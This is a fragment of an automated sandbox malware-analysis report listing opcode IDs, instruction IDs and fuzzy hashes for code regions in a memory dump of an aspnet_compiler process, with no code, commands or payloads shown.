                                                    • Opcode ID: e328f1dbea2031a0ec3edd323bbdcba0358b4699dcd557c3f9995e90865a5568
                                                    • Instruction ID: e76b636b316868d886e71cac656d906552a5489571750ac41376ce423f3a615e
                                                    • Opcode Fuzzy Hash: e328f1dbea2031a0ec3edd323bbdcba0358b4699dcd557c3f9995e90865a5568
                                                    • Instruction Fuzzy Hash: 24513631A08606EFEF16EF68C848BADBBF5FF54715F2040A9E4D293690DB709901CB90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                                    • Instruction ID: 8d473e1e78f714d0489163a84db8e4256b9250131e1ca2ceced1ef7c8c8fa98c
                                                    • Opcode Fuzzy Hash: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                                    • Instruction Fuzzy Hash: E0514871200A499FCB62EF69C9D0EEAB3F9FF14784F400469E69697660DB34E940CB50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction ID: dd9ae5344e55755c53ef42066300323c417581c3183800fc1051e6dc2d31e81a
                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction Fuzzy Hash: 09518C79E0024AABDF15DB98C840BEEBBF5BF48350F484069EA81EB240D774DD44CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                    • Instruction ID: 112e75ef0478f67c882a6557b52118d3dcc0bf79fc88eaa574210522b28fc3d4
                                                    • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                    • Instruction Fuzzy Hash: AF518E716083429FDB19CF68D884B9ABBE5FFD8754F08892DF99487280D734E905CB52
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 446535427233b345160e977b78943245d79fdc67c549633877bca2131af94bc4
                                                    • Instruction ID: 51d4eaa716c13f6dcb997d1cd05e5e4f13617b39b58ef01e4b8e19198dfa8fd0
                                                    • Opcode Fuzzy Hash: 446535427233b345160e977b78943245d79fdc67c549633877bca2131af94bc4
                                                    • Instruction Fuzzy Hash: 00518C71B09616DFEF62AAA8CC40BEDB7F4BF18314F048068E8D1A7241DBB49940CB51
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                    • Instruction ID: 8bfe064119b60472637fe08ddab862dc46d0f874aa1254d9b9a449c39e8d60b5
                                                    • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                    • Instruction Fuzzy Hash: 80519071600606DFCB5ACF14C580A96FBB5FF45344F15C0AAE9189F222E371EA85CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbe44d69cc7ed0c64eec40d8d872c5beffb01f5fcaef77bd9ede788ff5131e62
                                                    • Instruction ID: cfbb572d84dc55d0cf004de98880d7d2af0984a41dbdc5653a1bd6246bb94245
                                                    • Opcode Fuzzy Hash: dbe44d69cc7ed0c64eec40d8d872c5beffb01f5fcaef77bd9ede788ff5131e62
                                                    • Instruction Fuzzy Hash: B0411371740205DBDB29FF69A8C1BEE37B4EB58718F00007CEA929B351DB729C448B50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 192a418e5a5ab59a6c7fae25537085f52d6e6048885e942a6884c9a1bfead6ab
                                                    • Instruction ID: 1d601ce0aea549c96abf11fccee889a7396de15f3be0524eeba4b97597d864a6
                                                    • Opcode Fuzzy Hash: 192a418e5a5ab59a6c7fae25537085f52d6e6048885e942a6884c9a1bfead6ab
                                                    • Instruction Fuzzy Hash: FF41DC31A01219DBDB14DF98C480AEFBBB5BF48B00F1481AAF999F7244E7359D45CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa684833ef4d602b3f1dfb3d06fbc7aaeb167543f996685d981b5bd049bdc6ac
                                                    • Instruction ID: cccae671eee24200c5c8566e6a048f7a287a68e9d8f4e2c8377920338ba1a31c
                                                    • Opcode Fuzzy Hash: fa684833ef4d602b3f1dfb3d06fbc7aaeb167543f996685d981b5bd049bdc6ac
                                                    • Instruction Fuzzy Hash: CE519B32608691CFD722EB5DC448B6A7BE5BB44754F0906A6F8C1CF691DB34DC40CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                    • Instruction ID: b34fa4a557e3ef49b87f7e92fc456c463d23b5daa5bcbcf85c0ff7de3617fbe3
                                                    • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                    • Instruction Fuzzy Hash: 49512875A00205DFDB58CFA8C482699BBF1FF58314B14C1AED95997745D334EA80CF90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2db7b2751a678c9151427cb3489b8df6ce113ce024ddf345665887f4ebd3dab9
                                                    • Instruction ID: 662f95352b62678dcabdd692732675a23f87d3241ac11680769e3457974c79a5
                                                    • Opcode Fuzzy Hash: 2db7b2751a678c9151427cb3489b8df6ce113ce024ddf345665887f4ebd3dab9
                                                    • Instruction Fuzzy Hash: 1051E470A04A06DFEB65AB28CC14BE8BBF1EB11314F0582E5E5E9A73D1DB759981CF40
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 883c38350bb685520047581e6a129ce4e7ee2f33f13f4058a8d3fcb94c729e28
                                                    • Instruction ID: 1f3f0c4081773c5e5370668aef7550b304689903ebe07148b12c6d57d903672b
                                                    • Opcode Fuzzy Hash: 883c38350bb685520047581e6a129ce4e7ee2f33f13f4058a8d3fcb94c729e28
                                                    • Instruction Fuzzy Hash: 7241B0B1A41706EFEB26AF69C980BAABBF8FF10794F008469E595DB250D770D841CF50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                                    • Instruction ID: 1c0bec5d6de3c5ef97a4aaecb471d7906c9166e99890f2bb60aecf17eda5bf96
                                                    • Opcode Fuzzy Hash: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                                    • Instruction Fuzzy Hash: 1D419E31A45209CFDB25DFACC4547ED7BF0BB58350F4401A9D4A1AB2D1DB349980CBA5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                    • Instruction ID: ab6b045f3613128f319aeb3b7b51925f2ad561a22f8ca262287168a1eaa9032b
                                                    • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                    • Instruction Fuzzy Hash: D4412731F00311DBEB62DE6984407FEBBA1EB51764F1A84EAF9C58B240D6329D80CBD4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                                    • Instruction ID: 8aa6f1aeb55a24096d72b574122ef4a8759b4ff5c12e03cbb1378b19bfcd5dac
                                                    • Opcode Fuzzy Hash: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                                    • Instruction Fuzzy Hash: 5741E372A046469FC325DF68CC50BAAB7E5FFC8740F14462DF9948B680E770E904CBA6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction ID: 947887ab229d66f7bf740b5c592d3c8d16fad31f2259e5e9d9f5389796a98961
                                                    • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction Fuzzy Hash: 2E31E031A04249AFDF629B69CC44BDEBBEDAF14350F04C1A6F899D7256C7749884CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50aa6c9e0cf5cc9ac6bb10b34254812546c4b6a72db194ded57a3011498dc328
                                                    • Instruction ID: e89a093a90a7508b596d8c738567d82257e53b6fa50c0341d8140aa5e0db3fa3
                                                    • Opcode Fuzzy Hash: 50aa6c9e0cf5cc9ac6bb10b34254812546c4b6a72db194ded57a3011498dc328
                                                    • Instruction Fuzzy Hash: 2A31B576B0062DAFDB25CBA8CC40B9EBBB5EF85714F4041D9A58CA7280DB319D84CF51
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 180595b02a87344b7856e7842d96cbaa78a81e69694dcfc03d307fa450346e1f
                                                    • Instruction ID: 494429da09495148e709079b92fea18dd612a8664baa7cdd95b5c42111b2b5bc
                                                    • Opcode Fuzzy Hash: 180595b02a87344b7856e7842d96cbaa78a81e69694dcfc03d307fa450346e1f
                                                    • Instruction Fuzzy Hash: 7231CE31305A06EFCB96BB65DE84A9ABBA6BF54314F404065E9D147A51DBB0E820CBD0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                                    • Instruction ID: 3db03d3d63a13d049aef329aa8604dd96be65c1459993aec063eab0e7af10283
                                                    • Opcode Fuzzy Hash: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                                    • Instruction Fuzzy Hash: 9041BD71204B46DFD766DF29C884BDA7BE5AB58314F00846DFAD9CB250C7B4E804CB50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                    • Instruction ID: fcfee4780c6a01b3571eaf537373ea152dd48abad1a6716245319be0083deea5
                                                    • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                    • Instruction Fuzzy Hash: F53106316083429FEB61DAADCC00B7BBBD5BB85750F8981AAF9C5CB391D274D841C792
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f565a452c6f298849ba1a261415cbe5f64e5d486ec93bd708774d2c5ab32586
                                                    • Instruction ID: a585c9a91e0c72ace3ff137b1fb75a4a2a413292756937f53525d06873bbd629
                                                    • Opcode Fuzzy Hash: 6f565a452c6f298849ba1a261415cbe5f64e5d486ec93bd708774d2c5ab32586
                                                    • Instruction Fuzzy Hash: 2E312472901208AFC721DF18C840AAA7BF5FF44364F1442A9ED958B291DB31ED42CBD4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f50908da925f802f5fd519fc6a72bdfbf7120af09d5ca447ed41bad65409bb4
                                                    • Instruction ID: e662d1fe9150a44f7080cc2430b4ec28dd94349bd6039c5edaa99b3192040a36
                                                    • Opcode Fuzzy Hash: 9f50908da925f802f5fd519fc6a72bdfbf7120af09d5ca447ed41bad65409bb4
                                                    • Instruction Fuzzy Hash: 8E31E175A0021ABBDB19DF98CC80FAEB7B5FB49B44F454168E900EB244D770ED40CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6dfd43383be95a09a2032536709c9bb9944e91b7e1acba817ef365bcc056100
                                                    • Instruction ID: 8e1bfe04ed1d8603b55aa8f051c4e64413d3b239f3778b0f8f6af2b057adc410
                                                    • Opcode Fuzzy Hash: a6dfd43383be95a09a2032536709c9bb9944e91b7e1acba817ef365bcc056100
                                                    • Instruction Fuzzy Hash: E631E871640616AFDB1E9F59C850BAEB7B5AF85F58F014069E505DB341DB30DC00CB90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79b0bcc6f1858f844a142b3a1d333635235f93822129675d9808e56ea9739790
                                                    • Instruction ID: d41d98600419774b7bf4d19debf573870a4855213bbc4900becd6eb409046358
                                                    • Opcode Fuzzy Hash: 79b0bcc6f1858f844a142b3a1d333635235f93822129675d9808e56ea9739790
                                                    • Instruction Fuzzy Hash: 023190716093118FE3A4DF19C844B1ABBE9FF98710F4449AEF9C497292D770E844CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                    • Instruction ID: c21cc6fbe49761ad2ba917a9a85c9eeaca3ff40d561462ff3d68c090c32afe6a
                                                    • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                    • Instruction Fuzzy Hash: 8B311575604306CFC750CF2CC48095ABBE6FF99318B2586A9E9989B315E730ED06CB91
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f0acaec56d7137ec67406ccda891d67fc15dfdb9649c55a8357541b138c1606
                                                    • Instruction ID: 995dd74cf919e5fede9b39f6a3c8987365807f804f13c67c2d08df5bf92c4db5
                                                    • Opcode Fuzzy Hash: 3f0acaec56d7137ec67406ccda891d67fc15dfdb9649c55a8357541b138c1606
                                                    • Instruction Fuzzy Hash: A431E236B006059FD724EFF9C980AAEBBFAAB84304F548429D195D7254DB70D941CB90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                    • Instruction ID: 6087f0104baba51ce1a3dc1a6fbf7a4e7ece64ba277a5d83551e8b4f18cfd223
                                                    • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                    • Instruction Fuzzy Hash: 7831ADB160820A9FCB02EF19D84099A7BE9FF99714F000569FC91D73A1D730DC01CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 374845dead82de9cd0d72c341b138c783a380590d9ec9973d9fbdfa6292adbd0
                                                    • Instruction ID: c25a8998828bd6eb9d4dc7fe82b8c30e1a2b98ea95318902cae563b8d515dade
                                                    • Opcode Fuzzy Hash: 374845dead82de9cd0d72c341b138c783a380590d9ec9973d9fbdfa6292adbd0
                                                    • Instruction Fuzzy Hash: 6B3125B15003119BDB65AF68CC40BA97BB4BF54314F9481E9E9C99B382EA34D982CB90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction ID: 1187b49ac223664e0d07cec27333c941efb36327696cbb45075e45131e26d50f
                                                    • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction Fuzzy Hash: 6C212B36600656A6CB19ABA5D800BFABBB4EFC0714F40801BFAD59B691E734D940C7E0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18e4d1d0017bafdd206c6a9c6acecace49b4766f779305f92b6be656ea263513
                                                    • Instruction ID: 19e6cf070d451f19ffab3e2e2a89e35c628ccb1618179d9e6be2277bdfdb57bf
                                                    • Opcode Fuzzy Hash: 18e4d1d0017bafdd206c6a9c6acecace49b4766f779305f92b6be656ea263513
                                                    • Instruction Fuzzy Hash: 2B31B431E0252C9BDB35DF18CC41FEE77B9AB15740F0101E5E6D5AB290DA74AE808FA4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                    • Instruction ID: 5eef5bc2f57ecd7ed9d23eae8ded3c999962229f2a5fea3eda646aeb7c8d8cb7
                                                    • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                    • Instruction Fuzzy Hash: 73216D32A00609EBCB15CF58C9C0ADEBBA5FF58714F10806AEE56DB242D671EA058B91
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da6267ed2102b7d799a2cebaca5f10a38a581ec38df9659f5ae87a303ea9520a
                                                    • Instruction ID: cd12919d312f68e38f752fe69679fce78f6df42e2fbe6b19b1bcf67bd67f92a4
                                                    • Opcode Fuzzy Hash: da6267ed2102b7d799a2cebaca5f10a38a581ec38df9659f5ae87a303ea9520a
                                                    • Instruction Fuzzy Hash: D0219372604B459BCB21DF58C880BAB77E4FB88760F014559FD959B642D730EE41CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction ID: d4f17dba35d284c4a093e39ff0f4bd1597589bad0ebd936e8e9b56ba0d7b39d1
                                                    • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction Fuzzy Hash: 9D319C31A01605EFD721CFA8C884F6AB7F9EF85354F1045A9E5928B280E730EE02CB50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35954fb0295a7025cdbcd07f0574ad5553f5ef8d18efa150d1821e30f4783603
                                                    • Instruction ID: f2986c16b980763aa0e4865eb75ac0ba35f7ab10bd1c8d8babe9d32444f672ed
                                                    • Opcode Fuzzy Hash: 35954fb0295a7025cdbcd07f0574ad5553f5ef8d18efa150d1821e30f4783603
                                                    • Instruction Fuzzy Hash: 02212C715047059BD724FB68C940FDAB7F8BF64658F00082AFAD4D7690EB30D844CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                    • Instruction ID: 9064cc137ad3ff46256061789ebd0636d824e692f8d1d9661e905376d29919d8
                                                    • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                    • Instruction Fuzzy Hash: A521D1722002069FD719DF59C440B6ABBE9EF85361F5581ADE14ACB390EB70EC01CB94
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af43fd925b78e620417d1c83ba28b54403d23a136d2b815c8cb2f9695d617a22
                                                    • Instruction ID: a017ac0553a06da4845c5a74f83cd59ff4b018f316c64adf0be9259e19dbf783
                                                    • Opcode Fuzzy Hash: af43fd925b78e620417d1c83ba28b54403d23a136d2b815c8cb2f9695d617a22
                                                    • Instruction Fuzzy Hash: 4821AB71A00645ABDB1ADB68D850FAAB7A8FF48780F14006AF944DB690D774ED40CBA8
                                                    Memory Dump Source
